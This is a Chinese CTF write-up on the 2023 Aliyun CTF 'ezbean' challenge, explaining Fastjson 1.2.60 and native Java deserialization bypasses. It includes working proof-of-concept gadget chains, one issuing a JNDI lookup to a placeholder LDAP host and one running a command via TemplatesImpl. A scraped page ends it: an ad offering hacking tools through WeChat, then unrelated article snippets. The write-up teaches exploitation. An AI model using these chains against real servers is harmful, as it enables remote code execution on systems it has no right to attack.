Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

2023 Aliyun CTF ezbean是一道CTF java反序列化题目。 题目的目的是让选手通过一个java原生反序列化入口,最终达成RCE。本文对题目的几种解法做了具体的分析,主要分为预期解法和非预期解法两种思路。通过对Fastjson在反序列化的行为分析,从两个方向攻克本题。

 

预期解

题目的逻辑简单清晰,通过 /read 路由可以传入 data 参数进行反序列化。题目的依赖就是 springboot 和 fastjson1.2.60 。

package com.ctf.ezser.utils;

import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectStreamClass;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

public class MyObjectInputStream extends ObjectInputStream {

   private static final String[] blacklist = new String[]{
           "java\\.security.*", "java\\.rmi.*",  "com\\.fasterxml.*", "com\\.ctf\\.*",
           "org\\.springframework.*", "org\\.yaml.*", "javax\\.management\\.remote.*"
   };

   public MyObjectInputStream(InputStream inputStream) throws IOException {
      super(inputStream);
   }

   protected Class resolveClass(ObjectStreamClass cls) throws IOException, ClassNotFoundException {
      if(!contains(cls.getName())) {
         return super.resolveClass(cls);
      } else {
         throw new InvalidClassException("Unexpected serialized class", cls.getName());
      }
   }

   public static boolean contains(String targetValue) {
      for (String forbiddenPackage : blacklist) {
         if (targetValue.matches(forbiddenPackage))
            return true;
      }
      return false;
   }
}

可以看到 MyObjectInputStream 继承 ObjectInputStream 并重写了 resolveClass() 方法,对反序列化的类进行了检查。

结合黑名单容易想到需要进行二次反序列化,但是常见的二次反序列化的起点类都被 ban 了,结合 pom.xml 中的 Fastjson 依赖考虑使用 Fastjson 进行反序列化。结合题目给的 MyBean 类

package com.ctf.ezser.bean;

import java.io.IOException;
import java.io.Serializable;
import javax.management.remote.JMXConnector;

public class MyBean implements Serializable {

   private Object url;
   private Object message;
   private JMXConnector conn;


   public MyBean() {}

   public MyBean(Object url, Object message) {
      this.url = url;
      this.message = message;
   }

   public MyBean(Object url, Object message, JMXConnector conn) {
      this.url = url;
      this.message = message;
      this.conn = conn;
   }

   public String getConnect() throws IOException {
      try {
         this.conn.connect();
         return "success";
      } catch (IOException var2) {
         return "fail";
      }
   }

   public void connect() {}

   public Object getMessage() {
      return this.message;
   }

   public void setMessage(Object message) {
      this.message = message;
   }

   public Object getUrl() {
      return this.url;
   }

   public void setUrl(Object url) {
      this.url = url;
   }
}

JMXConnector 接口的实现类在题目环境下仅存在 RMIConnector 一种实现类,结合 JMXService 可以在调用 getConnect() 方法时触发 JNDI 查询。这里不难想到利用 Fastjson 调用 Mybean 的 getter 方法。

结合题目可以想到利用 javax.management.BadAttributeValueExpException 作为反序列化起点,这个 BadAttributeException 在反序列化时会对自己的 val 属性调用 toString 方法。

将 JSONObject 作为 val ,也就相当于调用了 JSONObejct 的 toString() 方法。在 Fastjson<=1.2.48 时 Fastjson 没有实现自己的反序列化逻辑,但在高于 1.2.48 时 Fastjson 的 JSONObject 和 JSONArray 都实现了自己的 readObject()方法。

使用自己的 SecureObjectInputStream 包裹输入流从中获取序列化数据。

其中的 resolveClass 会调用 Fastjson 的 checkAutoType 来检查反序列化的数据是否合法。RMIConnector 和 JMXService 在 Fastjson 1.2.60 中均不属于黑名单,按照 AutoType 的逻辑

这里 name 就是 classname 类名。expectClass 为 null。按照这里 autoTypeSupport 应该为 true 才不会 throw error,但是我们实际尝试发现其实并不会报错,但是我们也并没有手动开启 autoType。这是因为在调用 checkAutoType 函数时我们传入的最后一个参数为 Feature.SupportAutoType.mask 而我们进行比较时用的是 feature & Feature.SupportAutoType.mask ,这里 feature 就是我们传入的 Feature.SupportAutoType.mask,这样就相当于传入了开启 autoType 的选项。

这里经过 mask 后为 true,也就相当于开启了 autoTypeSupport 。

JSONObject json= new JSONObject();
JMXServiceURL jmxServiceURL = new JMXServiceURL("service:jmx:rmi:///jndi/ldap://xxx.xxx.xxx.xxx:1389/Tomcat");
RMIConnector rmiConnector = new RMIConnector(jmxServiceURL,null);
MyBean myBean = new MyBean("a","a", rmiConnector);
json.put("YYY", myBean);
BadAttributeValueExpException poc = new BadAttributeValueExpException(1);
Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
val.setAccessible(true);
val.set(poc,json);
byte[] code =  serialize(poc);
deserialize(code);

会出 Exception

exception in thread "main" com.alibaba.fastjson.JSONException: default constructor not found. class javax.management.remote.rmi.RMIConnector at com.alibaba.fastjson.util.JavaBeanInfo.build(JavaBeanInfo.java:516) at com.alibaba.fastjson.util.JavaBeanInfo.build(JavaBeanInfo.java:221)

阅读 JavaBeanInfo 逻辑可以知道它会尝试获取无参构造函数,我们的 RMIConnector 和 JMXService 都不具备无参数公有构造函数的条件,所以在这里一定会报错。当时比赛卡这里了,后来看了 WP 才知道,多打几次就可以。只需要多 deserialize(code); 几次即可,StrewHat 的 wp 写的是因为 fastjson 构造函数是随机获取,其实并非如此。我们来详细看一下为什么多反序列化几次就可以。

这里抛出异常

这里遍历了全部构造函数,寻找符合要求的构造函数,都找不到所以报错,这里阅读逻辑后发现和顺序没有关系,因为

无论运行多少次都会完整遍历 DeclaredCtor 。那为什么进行多次反序列化后,就可以正常反序列化呢?继续向前看,在 ParserConfig 中

在 build 之前把这个类缓存了,存在一个 static 的 mapping 中

在第二次反序列化时

会在上层代码尝试从缓存获取类中拿到类因而提前返回。也就走不到

JavaBeanInfo.build 这一步,也就不会报错找不到默认构造函数了。因此只需要多打几次 payload 就能成功 rce 。

非预期解

Y4tacker 师傅前段时间发布了一篇(https://paper.seebug.org/2055/)关于

的文章,文中提到低版本才能利用,但其实高版本也能利用,这是因为后来有师傅提出可以利用 java 序列化机制中的引用机制来进行绕过

  • 反序列化流程分析总结 - panda | 热爱安全的理想少年

  • FastJson与原生反序列化(二)

简单来说,高版本不能利用的原因是因为 Fastjson 的 readObject 实现了自己的 resolveClass 逻辑,会 ban 黑名单中的类,比如 TemplatesImpl

Object tpl = createTemplatesImpl("open -a Calculator.app");
        JSONObject jsonObject = new JSONObject();
        jsonObject.put("gg",tpl);

        BadAttributeValueExpException poc = new BadAttributeValueExpException(null);
        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
        val.setAccessible(true);
        val.set(poc,jsonObject);

反序列化时会因为 TemplatesImpl 处于 fastjson 的黑名单中而被禁止反序列化

这里我们的思路就转变为如何绕过 resolveClass 函数检查。通过对 java 原生反序列化流程的学习,我们先看在啥时候 java 会去调用 resolveClass ,毕竟反序列化的数据类型也有很多。

也就是只有 TC_CLASSDESC 会调用 readNonProxyDesc -> resolveClass 。由于我们要尝试绕过的东西本质是一个类,所以这里我们能选择的就是 TC_REFERENCE 或者 TC_PROXYCLASSDESC我们先看看能不能用代理类绕过

可以看到在序列化过程中会使用反射判断一个类是否是代理类,若是代理类则写入 TC_PROXYCLASSDESC

反序列过程中会重建代理类,对于 TemplatesImpl 显然行不通

一路走不通只能考虑用 TC_REFERENCE 了在序列化过程中

如果在 handles 中查到缓存的 obj,那就直接写 TC_REFERENCE

也就不会调用 resolveClass

最终 poc,没有用到题目给的 ezBean

Object tpl = createTemplatesImpl("open -a Calculator.app");
        JSONObject jsonObject = new JSONObject();
        jsonObject.put("gg",tpl);

        BadAttributeValueExpException poc = new BadAttributeValueExpException(null);
        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
        val.setAccessible(true);
        val.set(poc,jsonObject);
        HashMap hashMap = new HashMap();
        hashMap.put(tpl,poc);
        byte[] code =  serialize(poc);
        deserialize(code);

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

 1.学习路线图 

 攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

 (都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。 

 因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。 

 还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取

 最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

 因篇幅有限,仅展示部分资料,需要保存下方图片,微信扫码即可前往获取 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/723797.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

GIT----使用技巧之保存现场回退新建分支继续开发

GIT----使用技巧之保存现场回退新建分支继续开发 前言&#xff1a; 故事是这样的&#xff0c;有一个比较复杂的项目使用的是STM32F103VCT6&#xff08;资源flash-256k,RAM-48k&#xff09;,开发到一半发现RAM不够用了&#xff0c;换容量更大的芯片STM32F103VGT6&#xff08;资源…

0.4 隔行扫描(Interlaced Scan)简介

0.4 隔行扫描简介 隔行扫描&#xff08;Interlaced Scan&#xff09;是一种将图像显示在扫描式的显示设备上的方法&#xff0c;例如阴极射线管&#xff08;CRT&#xff09;。 隔行扫描设备交替扫描图像的奇场&#xff08;图像的所有奇数行&#xff0c;1、3、5&#xff09;和偶…

Excel 找出最大值及其相邻的 N 个成员

某列都是数值&#xff1a; A1132213464215496973482396101113712491342144015151631171718114719182030212222423252419251326272738283029163012312332333233419351436463723383739384028 请找出最大值及其相邻的 10 个成员&#xff0c;注意越界检查&#xff0c;实际符合条件…

银行数仓项目实战(四)--了解银行业务(存款)

文章目录 项目准备存款活期定期整存整取零存整取存本取息教育储蓄定活两便通知存款 对公存款对公账户协议存款 利率 项目准备 &#xff08;贴源层不必写到项目文档&#xff0c;因为没啥操作没啥技术&#xff0c;只是数据。&#xff09; 可以看到&#xff0c;银行的贴源层并不紧…

Fisnar Liquid Control 操作维修手LC Pump Manual Twinmixer Maintenance 中文

Fisnar Liquid Control 操作维修手LC Pump Manual Twinmixer Maintenance 中文

基于springboot实现交通管理在线服务系统项目【项目源码+论文说明】

基于springboot实现交通管理在线服务系统演示 摘要 传统办法管理信息首先需要花费的时间比较多&#xff0c;其次数据出错率比较高&#xff0c;而且对错误的数据进行更改也比较困难&#xff0c;最后&#xff0c;检索数据费事费力。因此&#xff0c;在计算机上安装交通管理在线服…

【计算机网络仿真实验-实验2.7】单臂路由

实验2.7 单臂路由 1. 实验拓扑图 2. 测试连通性 测试PC1 PC2 PC3 之间的连通性 无法ping通&#xff0c;因为它们处在不同的网段&#xff0c;而二层交换机不具备路由功能&#xff0c;因此没办法接通 3. 在交换机上创建vlan10&#xff0c;并将端口0/2划分到vlan10中 Switch>…

CUDA系列-Mem-9

这里写目录标题 Static Architecture.Abstractions provided by CUSW_UNIT_MEM_MANAGERMemory Object (CUmemobj) Memory Descriptor(CUmemdesc)Memory Block(CUmemblock)Memory BinsSuballocations in Memory BlockFunctional description Memory Manager 你可能觉得奇怪&…

分班查询,一键发布,老师们都在用的分班查询系统

老师们开学季马上又要到了&#xff0c;回想起了每年埋头苦干&#xff0c;对着一堆堆的学生名单&#xff0c;一个个手动分配班级&#xff0c;再一个个通知家长和学生的日子&#xff0c;那种手忙脚乱&#xff0c;生怕出错的紧张感&#xff0c;是不是还历历在目&#xff1f;每次分…

工作人员能从轧钢测径仪上获取哪些有效信息?

轧钢测径仪安装在轧钢生产线中&#xff0c;无论是热轧还是冷轧&#xff0c;都不能阻挡测径仪的高速无损高精检测。它采用八轴测量系统&#xff0c;能全方位检测外径尺寸&#xff0c;并且配备了测控软件系统&#xff0c;为工作人员提供更加丰富的产线信息。 普通轧钢测径仪能获…

汽车IVI中控开发入门及进阶(三十一):视频知识扫盲

有效的视频资源管理需要集成许多不同的底层技术,共同为用户提供给定应用程序的最佳体验。其中许多技术是从早期电视广播中使用的技术演变而来的。其他方法,如用于通过网络流式传输视频的压缩方法,相对较新且不断发展。 以下详细概述了与图形和视频处理和传输相关的一些基本…

微信小程序入门1

什么是微信小程序&#xff1f; 与传统的原生应用相比&#xff0c;微信小程序是一种全新的连接用户与服务的应用&#xff0c;它可以在微信内被便捷地获取和传播&#xff0c;同时具有良好的用户体验。微信小程序是运行在微信中的应用&#xff0c;是一种不需要下载即可使用的应用…

大众标准化杂志大众标准化杂志社大众标准化编辑部2024年第10期目录

计量技术 计量标准监管体系下的新型技术和新业态监管研究 姚雪艳; 1-3 基于电力能源计量技术节能降耗应用研究 肖冰雪; 4-6 标准课堂《大众标准化》投稿&#xff1a;cnqikantg126.com 现代药物分析技术在中药鉴定中的应用与标准化探索 秦士慧;李婷; 7-9 基于装…

分布式操作系统入门:可的哥(Codigger)引领新潮流

早期&#xff0c;大型机系统盛行&#xff0c;随后个人计算机如Windows、Mac OS等操作系统普及。随着技术发展和计算需求增长&#xff0c;单机系统的局限显现&#xff0c;推动了分布式操作系统的崛起。操作系统演进显露出从单机到多机、从集中到分散的趋势。传统单机系统在处理大…

集合系列(二十六) -利用LinkedHashMap实现一个LRU缓存

一、什么是 LRU LRU是 Least Recently Used 的缩写&#xff0c;即最近最少使用&#xff0c;是一种常用的页面置换算法&#xff0c;选择最近最久未使用的页面予以淘汰。 简单的说就是&#xff0c;对于一组数据&#xff0c;例如&#xff1a;int[] a {1,2,3,4,5,6}&#xff0c;…

【Linux】Centos升级到国产操作系统OpenAnolis

一、前言 Anolis OS 7生态上和依赖管理上保持跟CentOS7.x兼容&#xff0c;一键式迁移脚本centos2anolis.py&#xff0c;实现CentOS7.x到Anolis OS 7的平滑迁移 使用迁移脚本前需要注意如下事项&#xff1a; 迁移涉及到软件包的重新安装&#xff0c;是不可逆过程&#xff0c;…

破解神器!Mathtype7.6最新破解版下载体验教程

大家好啊&#xff0c;我是你们的种草机&#x1f469;‍&#x1f4bc;&#x1f680;&#xff01;今天来分享一个超级给力的学术利器——Mathtype7.6最新破解版。作为一名经常和公式打交道的科研狗&#x1f436;&#x1f52c;&#xff0c;这个软件简直是救星啊&#xff01; Math…

cs144 LAB1 基于滑动窗口的碎片字节流重组器

一.StreamReassembler.capacity 的意义 StreamReassembler._capacity 的含义&#xff1a; ByteStream 的空间上限是 capacityStreamReassembler 用于暂存未重组字符串片段的缓冲区空间 StreamReassembler.buffer 上限也是 capacity蓝色部分代表了已经被上层应用读取的已重组数…

XL5300 dTOF测距模块 加镜头后可达7.6米测距距离 ±4%测距精度

XL5300 直接飞行时间&#xff08;dToF&#xff09;传感器是一个整体方案dTOF 模组&#xff0c;应用设计简单。片内集成了单光子雪崩二极管&#xff08;SPAD&#xff09;接收阵列以及VCSEL激光发射器。利用自主研发的 SPAD 和独特的ToF 采集与处理技术&#xff0c;XL5300模块可实…

无线麦克风哪个品牌音质最好,领夹麦克风品牌排行榜前十名推荐

​在数字化时代的背景下&#xff0c;声音的传播与记录变得日益重要。无论是会议室、教室还是户外场所&#xff0c;无线领夹麦克风凭借其便携性和稳定的连接性能&#xff0c;成为人们沟通表达的首选工具。面对众多选择&#xff0c;我为你精选了几款性能卓越且性价比高的无线领夹…